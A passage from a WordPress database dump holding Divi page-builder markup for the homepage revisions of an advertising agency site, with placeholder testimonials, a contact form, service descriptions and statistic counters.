text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-02 21:13:04','2020-08-02 21:13:04','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/02/134-revision-v1/',0,'revision','',0),(386,1,'2020-08-04 18:44:49','2020-08-04 18:44:49','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" 